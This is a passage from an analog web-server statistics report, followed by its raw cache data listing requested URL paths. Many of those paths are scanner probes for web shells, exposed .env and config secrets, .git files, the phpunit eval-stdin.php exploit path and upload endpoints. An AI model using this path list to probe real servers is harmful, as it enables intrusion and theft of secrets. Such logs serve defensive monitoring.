0.62%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">132</td><td class="b">39.12%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">66</td><td class="b">60.26%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">114</td><td class="b">47.10%</td><td class="xl">[directories]</td></tr> <tr><td class="R">50</td><td class="b">36.49%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">17</td><td class="b">11.99%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">17</td><td class="b"> 3.79%</td><td class="xl">.svg</td></tr> <tr><td class="R">14</td><td class="b"> 0.62%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">84</td><td class="b">52.28%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">114</td><td class="b">47.10%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">14</td><td class="b"> 0.62%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">114</td><td class="b">47.10%</td><td class="D">Feb/21/25 7:40 PM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b">11.31%</td><td class="D">Feb/15/25 2:11 PM</td><td class="xl"> <a href="/?54.202.183.123">/?54.202.183.123</a></td></tr> <tr><td class="R">25</td><td class="b">31.58%</td><td class="D">Jan/24/25 4:04 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">25</td><td class="b"> 4.91%</td><td class="D">Jan/24/25 4:04 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">48</td><td class="b">16.41%</td><td class="D">Jan/24/25 4:04 PM</td><td class="xl">[not listed: 8 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK J�[�`\�i� i� cachenu "�] � CACHE type 5 produced by analog 6.0/Unix. Do not modify or delete! T 0 0 896 592 19 5346 1156887 D 28845583 29416384 20031 188 7 0 563 20031 189 22 8 21806 20031 203 4 4 2456 20031 204 10 2 9978 20031 205 10 2 9970 20031 212 10 2 9970 20031 267 4 4 5064 20032 9 1 1 616 20032 78 2 0 2683 20032 115 18 4 18026 20032 128 1 1 616 20033 11 1 1 616 20033 190 1 1 616 20034 108 3 1 3299 20035 24 1 1 616 20035 190 1 1 616 20036 270 1 1 616 20037 150 1 1 616 20037 151 1 0 2321 20037 200 1 1 1262 20037 250 1 1 1266 20038 44 1 1 616 20040 240 3 1 3299 20041 275 1 1 616 20042 116 1 1 612 20042 274 1 1 616 20043 16 1 1 616 20043 45 1 1 616 20043 82 1 1 616 20043 274 1 1 616 20044 208 1 1 1262 20044 274 1 1 616 20045 0 1 1 1266 20045 178 1 1 616 20047 200 1 1 616 20048 10 2 2 1882 20048 122 2 2 1882 20049 179 1 1 616 20051 67 1 1 616 20053 49 5 1 4989 20056 50 1 1 612 20057 47 1 1 616 20060 36 3 1 3299 20060 262 1 1 1266 20063 149 1 1 616 20064 1 1 1 616 20068 203 1 1 616 20069 183 1 1 612 20070 87 1 1 612 20070 127 1 1 616 20071 158 1 1 616 20073 181 1 1 1262 20074 45 1 1 1266 20084 41 1 1 612 20085 40 1 1 616 20085 125 1 1 616 20090 221 1 1 1266 20092 192 17 5 9678 20092 193 1 1 612 20092 214 8 2 8064 20093 8 5 1 4989 20093 173 1 1 616 20094 51 1 1 616 20094 52 1 1 1266 20094 201 1 1 1262 20095 179 1 1 616 20098 202 1 1 612 20099 148 1 1 616 20100 31 1 1 1266 20100 125 1 1 1262 20101 242 1 1 616 20102 172 1 1 616 20106 280 1 1 1262 20108 136 1 1 616 20108 247 1 1 1266 20112 82 1 1 612 20113 105 1 1 616 20113 192 5 1 4989 20115 27 1 1 616 20118 63 1 1 616 20126 184 1 1 612 20127 92 1 1 616 20129 48 1 1 616 20134 37 1 1 616 20135 170 1 1 616 20136 252 1 1 616 20137 171 1 1 616 20137 179 1 1 616 20139 212 1 1 616 20140 223 1 1 612 20141 236 1 1 616 20148 246 1 1 1266 20149 109 1 1 616 20153 193 2 0 128 20153 198 8 4 4112 20153 199 1 1 616 20153 201 2 2 1232 20153 226 6 2 5605 20153 229 8 2 8064 20154 9 5 1 4989 20154 116 1 1 612 20154 258 1 1 1266 20155 162 1 1 616 20155 172 3 3 3786 20155 184 3 1 3299 20155 227 1 1 616 20155 244 1 1 616 20157 180 1 1 616 20159 178 1 1 616 20161 115 1 1 612 20162 29 1 1 616 20162 245 1 1 1262 20162 259 1 1 1266 20163 0 2 0 2459 20164 117 1 1 616 20165 53 1 1 616 20168 66 1 1 612 20169 177 1 1 616 20170 152 1 1 1266 20170 247 1 1 616 20171 121 1 1 1262 20174 70 1 0 362 20182 183 1 1 612 20183 91 1 1 616 20184 159 1 1 1266 20187 67 1 1 612 20194 58 2 2 1232 20196 78 1 1 612 20197 86 1 1 616 20198 24 2 2 1232 20200 286 2 2 1232 20201 17 2 2 1232 20206 232 1 1 616 20206 267 1 1 616 20210 42 1 1 612 20210 55 3 3 3786 20211 172 1 1 616 20212 206 1 1 1266 20214 228 2 0 128 20214 229 28 8 22603 20215 165 3 1 3071 20215 194 1 1 616 20215 195 1 1 616 20215 271 1 1 616 20216 77 1 1 1266 20216 81 1 1 616 20217 197 1 1 616 20217 208 1 1 616 20218 98 3 3 3786 20218 135 1 1 616 20218 182 3 1 3295 20219 186 1 1 616 20219 220 3 1 3295 20219 277 3 1 3299 20220 9 1 1 612 20220 21 3 1 3299 20220 192 1 1 612 20221 54 2 1 974 20221 186 1 1 616 20221 219 1 1 616 20222 240 3 1 3295 20223 193 1 1 616 20224 185 1 1 612 20225 154 1 1 616 20226 90 1 1 1262 20226 122 4 4 3786 20226 127 1 1 616 20228 264 3 3 3786 20228 267 1 1 616 20232 26 2 2 1232 20233 97 1 1 1262 20233 204 1 1 616 20234 205 1 1 1266 20234 279 2 2 1232 20235 197 1 1 616 20237 59 2 2 1232 20237 183 1 1 616 20238 50 2 1 2749 20238 129 3 3 3786 20239 31 1 0 322 20239 88 1 1 616 20239 162 1 1 0 20239 179 1 1 1262 20240 146 1 1 1266 20240 247 1 1 1262 20241 234 1 1 1266 20242 42 2 2 1232 20244 244 1 1 616 20245 107 4 4 3786 20246 1 1 1 616 20247 18 1 1 616 20247 133 2 2 1232 20247 153 1 1 616 20247 154 1 1 616 20249 194 1 1 616 20252 51 3 3 3786 20252 244 1 1 612 20253 48 1 1 616 20254 96 1 1 1262 20257 261 1 1 612 20258 48 1 1 612 20261 8 1 1 612 20261 36 39 8 39483 20261 37 1 0 406 20266 55 1 1 612 20267 173 1 1 612 20268 207 1 1 1262 20269 86 2 2 1224 20269 270 2 2 1224 20271 86 3 3 2486 20271 146 2 2 1224 20272 285 1 1 1262 20275 228 2 0 128 20275 229 10 5 4795 20276 191 4 4 2448 20276 226 1 1 612 20276 229 1 1 612 20276 233 1 1 1262 20277 166 1 1 612 20277 170 3 3 3786 20277 235 1 1 612 20279 149 1 1 612 20279 206 2 2 1224 20280 73 1 1 612 20280 111 2 0 2683 20280 112 2 0 2683 20280 115 1 1 612 20281 168 1 1 612 20281 214 1 1 1262 20283 40 1 1 1262 20284 276 1 1 1262 20285 48 3 3 2486 20285 112 3 3 3786 20285 159 1 1 612 20285 268 1 1 612 20288 18 1 1 1262 20288 275 1 1 1262 20288 282 1 1 612 20289 13 1 1 1262 20291 18 3 3 3786 20291 99 1 1 1262 20291 116 1 1 612 20291 168 1 1 612 20291 212 1 1 612 20291 213 1 1 612 20293 65 1 1 1262 20293 66 1 1 1262 20293 150 1 1 612 20294 137 1 1 612 20295 200 1 1 612 20296 44 1 1 1262 20298 16 3 1 3071 20298 87 1 1 1262 20298 170 2 2 1224 20298 173 2 2 1224 20299 95 1 1 1262 20300 56 2 2 1224 20300 71 2 2 1224 20301 118 1 1 612 20304 211 1 1 612 20306 199 1 1 612 20308 64 1 1 612 20308 246 1 1 1262 20309 13 1 1 612 20309 140 2 2 1224 20309 199 1 1 612 20309 273 1 1 612 20310 53 2 2 1224 20311 127 3 3 3786 20311 157 1 1 612 20311 241 3 3 3136 20312 156 3 1 3369 20313 38 59 19 438747 20314 273 1 1 610 20316 143 3 3 3789 20317 10 1 1 610 20317 139 1 0 2321 20320 131 1 0 2321 20320 142 3 1 3069 20322 65 1 1 610 20322 240 3 1 3293 20322 267 3 1 3069 20323 81 1 1 610 20323 136 1 1 1263 20323 256 1 1 1263 20324 286 1 1 610 20324 287 2 2 1220 20325 96 3 3 3789 20325 193 1 1 610 20327 16 1 1 610 20327 244 1 1 610 20328 1 1 1 610 20328 279 4 4 2526 20331 9 1 1 610 20334 25 1 1 1263 20335 21 1 1 610 20335 78 2 2 1220 20336 100 1 1 610 20336 228 2 0 128 20336 264 11 4 4309 20336 265 1 1 610 20337 57 1 1 610 20337 85 4 4 2440 20337 104 2 2 1220 20337 127 1 1 610 20337 132 2 2 1220 20337 146 1 1 610 20337 150 1 1 610 20337 169 1 1 1263 20337 187 1 1 610 20337 227 1 1 610 20338 28 2 2 1220 20338 87 1 1 0 20338 250 2 2 1220 20339 49 1 1 610 20339 111 1 1 1263 20339 156 3 3 3789 20339 159 1 1 610 20339 232 1 1 610 20339 273 2 2 1220 20341 14 2 2 1220 20341 193 1 1 610 20343 90 1 0 322 20343 247 3 3 4113 20344 28 1 1 1371 20344 147 3 1 3140 20345 131 1 1 1371 20347 139 1 1 681 20347 253 1 1 681 20348 28 1 1 681 20349 0 2 2 0 20349 65 1 1 1371 20349 227 2 2 1362 20350 49 1 1 681 20350 123 2 2 1362 20350 148 1 1 681 20350 198 1 1 681 20350 214 4 4 5484 20350 257 2 2 1362 20351 176 2 2 1362 20351 183 1 1 681 20353 159 2 2 1362 20354 286 3 1 9759 20355 239 1 1 681 20359 169 1 1 1371 20362 183 1 1 1371 20363 205 1 1 681 20363 249 1 1 1371 20364 51 1 1 681 20364 258 1 1 1371 20365 131 1 1 681 20366 58 1 1 1371 20366 121 1 1 681 20367 23 2 2 1362 20367 124 1 1 1371 20367 172 3 1 3140 20371 187 1 1 1371 20373 269 1 1 1371 20374 85 1 1 1371 20376 213 4 2 4045 20378 158 1 1 681 20379 0 2 2 1362 20379 156 1 1 1371 20379 158 1 1 681 20380 40 1 1 1371 20382 20 3 3 4113 20382 77 1 1 681 20382 197 1 1 681 20382 200 1 1 681 20383 114 1 1 681 20383 135 1 1 681 20383 182 1 1 681 20383 249 2 2 1362 20384 66 4 1 4310 20384 110 1 1 1371 20384 116 4 1 4310 20384 146 1 1 681 20384 169 4 1 4310 20385 48 4 1 4310 20385 220 4 1 4310 20386 54 1 1 681 20386 55 1 1 681 20386 56 2 2 1362 20386 142 1 1 681 20386 229 1 1 681 20386 269 1 1 1371 20391 236 2 2 1362 20392 135 1 1 681 20393 25 1 1 681 20393 114 1 1 1371 20393 172 1 1 681 20393 224 1 1 1371 20394 130 1 1 1371 20394 162 1 1 1371 20396 112 1 1 1371 20397 35 1 1 1371 20397 93 1 1 681 20397 264 21 6 14807 20397 265 1 0 2321 20397 268 2 2 2742 20398 25 1 1 681 20398 52 1 1 1371 20398 78 3 3 4113 20398 166 2 2 1362 20398 172 1 1 681 20398 285 3 3 4113 20399 40 1 1 681 20399 155 1 1 681 20399 158 1 1 681 20399 169 3 3 4113 20401 177 1 1 681 20404 118 2 2 628 20404 119 1 1 314 20406 2 2 2 628 20406 140 1 1 314 20407 145 1 1 314 20410 184 3 3 942 20410 187 1 1 314 20413 221 1 1 314 20414 199 1 1 314 20417 161 2 2 1246 20420 173 1 1 314 20420 178 2 2 628 20421 40 1 1 314 20421 263 1 1 314 20423 259 1 1 314 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /.env.local 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /steal.php 1 0 0 0 4 0 0 29408500 0 0 29293088 0 /ext.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /storage/logs/laravel.log 1 0 0 0 2 0 0 29408500 0 0 29278603 0 /wp-admin/admin-post.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /coffee.php 1 1 1 0 0 28848470 0 0 28848470 0 0 616 /?35.92.223.216 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-includes/sodium_compat/index.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /menu.phphttps://robertatimothy.com/wp-content/packed.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /form.php 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /config.js 1 0 0 0 3 0 0 29381386 0 0 29337748 0 /shout.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /config/application.yml 1 0 0 0 2 0 0 29153337 0 0 29126052 0 /scripts/filemanager/dialog.php 1 0 0 0 2 0 0 29360411 0 0 29356548 0 /taktak.php 1 0 0 0 4 0 0 29387855 0 0 29333397 0 /cool.php 1 0 0 0 11 0 0 29171761 0 0 28997104 0 /wordpress 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /aws.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /bibil.php 1 0 0 0 5 0 0 29355503 0 0 29353290 0 /login/ 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /js/main.js 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /ex.php 1 0 0 0 2 0 0 29278602 0 0 29211739 0 /wp-admin/js/about.php7 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /class-db.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /1337.php 1 0 0 0 3 0 0 29408500 0 0 29356548 0 /ouh.php 1 0 0 0 3 0 0 29408500 0 0 29386605 0 /lo.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.development.local 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /mailer/.env 1 0 0 0 3 0 0 29408500 0 0 29333630 0 /AxAo.php 1 0 0 0 5 0 0 29408500 0 0 29333629 0 /shell1.php 1 0 0 0 1 0 0 28896692 0 0 28896692 0 /lib/.git/config 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /vendor/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /env.js 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /yee.php 1 0 0 0 1 0 0 29267994 0 0 29267994 0 /wp-config.php.php-bak 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /crm/.env 1 0 0 0 3 0 0 29360412 0 0 29346559 0 /doti.php 1 0 0 0 1 0 0 29374986 0 0 29374986 0 /.git/info/exclude 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-content/admin.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /fifii.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /ntgn.php 1 0 0 0 2 0 0 29153338 0 0 29126053 0 /plugins/jquery.filer/php/readme.txt 1 0 0 0 3 0 0 29408500 0 0 29356548 0 /shellalfa.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /f4.php 1 0 0 0 11 0 0 29408500 0 0 29293088 0 /aa.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /config/local.yml 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /media.php 1 0 0 0 2 0 0 29387855 0 0 29386605 0 /xo.php 1 0 0 0 5 0 0 29408500 0 0 29293088 0 /wp-update.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /axe.php 1 0 0 0 8 0 0 29370906 0 0 29333397 0 /mlex.php 1 0 0 0 2 0 0 29402869 0 0 29388621 0 /robots.txt?46.101.225.202 1 0 0 0 3 0 0 29378026 0 0 29293088 0 /ioxi2.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /plugins/plugins.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 2 0 0 29272325 0 0 29267995 0 /.env.test.local 1 0 0 0 1 0 0 29181346 0 0 29181346 0 /Telerik.Web.UI.WebResource.axd%3Ftype=rau?165.232.149.232 1 0 0 0 13 0 0 29416384 0 0 29345118 0 /bless5.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-admin/includes/plugin.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /abhgt.php 1 0 0 0 1 0 0 29211744 0 0 29211744 0 /wp-content/item.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /rpz.php 1 0 0 0 2 0 0 29250913 0 0 29250912 0 /akcc.php?p=cgi-bin&settings=1 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /card.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /Anonymous.php 1 0 0 0 2 0 0 29360412 0 0 29356548 0 /fns.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /phpinfo/info.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /config/app.php 1 0 0 0 1 0 0 29337748 0 0 29337748 0 /html.php 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /wp-configs.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /cmdline.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /wp-config 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /x4.php 1 0 0 0 5 0 0 29408500 0 0 29293088 0 /hook.php 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /_profiler/phpinfo/phpinfo.php 1 0 0 0 3 0 0 29373837 0 0 29365340 0 /d12.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /x56.php 1 0 0 0 3 0 0 29104700 0 0 29082634 0 /favicon.ico?3.8.194.88 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /config/aws.json 1 0 0 0 6 0 0 29398488 0 0 29211741 0 /ws.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /4563.php 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /awi.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /config.ini 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /keys.json 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /whv.php 1 0 0 0 4 0 0 29416384 0 0 29211739 0 /wp-admin/user/about.php 1 0 0 0 2 0 0 29360411 0 0 29356548 0 /cong.php?p= 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /website/.env 1 0 0 0 5 0 0 29408500 0 0 29293088 0 /manager.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /update.php 1 0 0 0 4 0 0 29373247 0 0 29117762 0 /wordpress/ 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /app.py 1 0 0 1 1 0 29250912 29250913 0 29250912 29250913 0 /akcc.php?copy=.well-known&p= 1 0 0 0 1 0 0 29265800 0 0 29265800 0 /wp/ 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /wp-swa.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /app.yaml 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /scripts/nodemailer.js 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /server/s3.js 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /apps/.env/.gitignore 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /modules/mod_simplefileuploadv1.3/elements/wpxadmin.php 1 0 0 0 1 0 0 29272324 0 0 29272324 0 /.gitignore 1 0 0 0 7 0 0 29408500 0 0 29278602 0 /shell.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /rafu.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /backdoor_access.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /test_info4.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /re.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /saas/.env 1 0 0 0 3 0 0 29416384 0 0 29368526 0 /item.php 1 0 0 0 1 0 0 29133704 0 0 29133704 0 /.svn/wc.db 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /suc.php 1 0 0 0 22 0 0 29416384 0 0 29293088 0 /lock360.php 1 0 0 0 4 0 0 29373003 0 0 29109309 0 /@vite/env 1 0 0 0 6 0 0 29373837 0 0 29345118 0 /flex.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /dr.php 1 0 0 0 2 0 0 29386605 0 0 29278602 0 /mini.php 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /ixj.php 1 0 0 0 2 0 0 29381386 0 0 29337748 0 /uwu2.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /getid3s.php 1 0 0 0 6 0 0 29401288 0 0 29145055 0 /2020/wp-includes/wlwmanifest.xml 1 0 0 0 20 0 0 29401288 0 0 29024062 0 /2019/wp-includes/wlwmanifest.xml 1 0 0 0 3 0 0 29408500 0 0 29370906 0 /wp-admin/js/wp-conflg.php 1 0 0 0 13 0 0 29408500 0 0 29293088 0 /efile.php 1 0 0 0 2 0 0 29153337 0 0 29126052 0 /assets/filemanager/dialog.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /node/.env_example 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /web 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /kill-9-1.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /oswkk.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /jspshell.jsp 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /blurbs8.php 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /bala.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /foot.php 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /luxe.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /app.js 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /Cok.php 1 0 0 0 6 0 0 29416384 0 0 29211738 0 /simple.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /wi.php 1 0 0 0 1 0 0 28989890 0 0 28989890 0 /.vscode/sftp.json?54.202.183.123 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.test.sample 1 0 0 0 3 0 0 29387855 0 0 29309619 0 /nc4.php 1 0 0 0 2 0 0 29153338 0 0 29126053 0 /assets/vendor_admin/plugins/jquery-file-upload/server/php/ 1 0 0 0 2 0 0 29381386 0 0 29337748 0 /wp-mt.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /error1.php 1 0 0 0 2 0 0 29153336 0 0 29126052 0 /kcfinder/upload.php 1 0 0 0 1 0 0 29211742 0 0 29211742 0 /wp-content/uploads/wp-login.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /asserter.php 1 0 0 0 1 0 0 29374986 0 0 29374986 0 /.git/ORIG_HEAD 1 0 0 0 16 0 0 29416384 0 0 29333397 0 /alfa.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /ccou.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /moie.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /apis/controllers/users.js 1 0 0 0 2 0 0 29278602 0 0 29211739 0 /wp-content/install.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /lara/phpinfo.php 1 0 0 1 0 0 29250912 0 0 29250912 0 0 /akcc.php?p=.well-known&upload= 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /sneaky_shell.php 1 0 0 0 2 0 0 29278602 0 0 29211739 0 /wp-includes/Text/about.php 1 0 0 0 1 0 0 29183317 0 0 29183317 0 /ads.txt?165.232.149.232 1 0 0 0 3 0 0 29408500 0 0 29333629 0 /nij.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-admin/includes/xmrlpc.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /fs7.php 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /fdd2.php 1 0 0 0 2 0 0 29398488 0 0 29375823 0 /link.php 1 0 0 0 5 0 0 29373838 0 0 29356079 0 /jlex3.php 1 0 0 0 1 0 0 29356079 0 0 29356079 0 /pm.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /Sources/API/.env 1 0 0 0 19 0 0 29375408 0 0 29024062 0 /wp-includes/wlwmanifest.xml 1 0 0 0 3 0 0 29408500 0 0 29378026 0 /content.php 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /tajj.php 1 0 0 0 2 0 0 29408500 0 0 29333629 0 /mws.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /d2.php 1 0 0 0 3 0 0 29408500 0 0 29375823 0 /wp-good.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /list.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /wd.php 1 0 0 0 2 0 0 29368526 0 0 29333629 0 /aipoyp.php 1 0 0 0 1 0 0 29228317 0 0 29228317 0 /style.php?165.232.149.232 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /service/.env.local 1 1 0 0 0 29197143 0 0 29197143 0 0 64 /.well-known/acme-challenge/I498YROX7NS93NSAL7MC7L9PK4Y7Z6LF?165.232.149.232 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /men.php 1 0 0 0 3 0 0 29282790 0 0 29116976 0 /_profiler/phpinfo 1 1 0 0 0 29285162 0 0 29285162 0 0 64 /.well-known/acme-challenge/832K2XAWDDIQPPYSVVIFSI2W3U-QO71X 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /src/config.php 1 1 0 0 0 29109304 0 0 29109304 0 0 64 /.well-known/acme-challenge/60JMD2RU72SRUT5W52CCLOENQ6LY7L7B 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /admin/controller/common/footer.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /.env.production.local 1 0 0 0 2 0 0 29368526 0 0 29333630 0 /class17.php 1 0 0 0 1 0 0 29116976 0 0 29116976 0 /aws.yaml 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /apache/phpinfo.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /admin/controller/extension/total.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /sex.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /kki.php 1 0 0 0 2 0 0 29398488 0 0 29386605 0 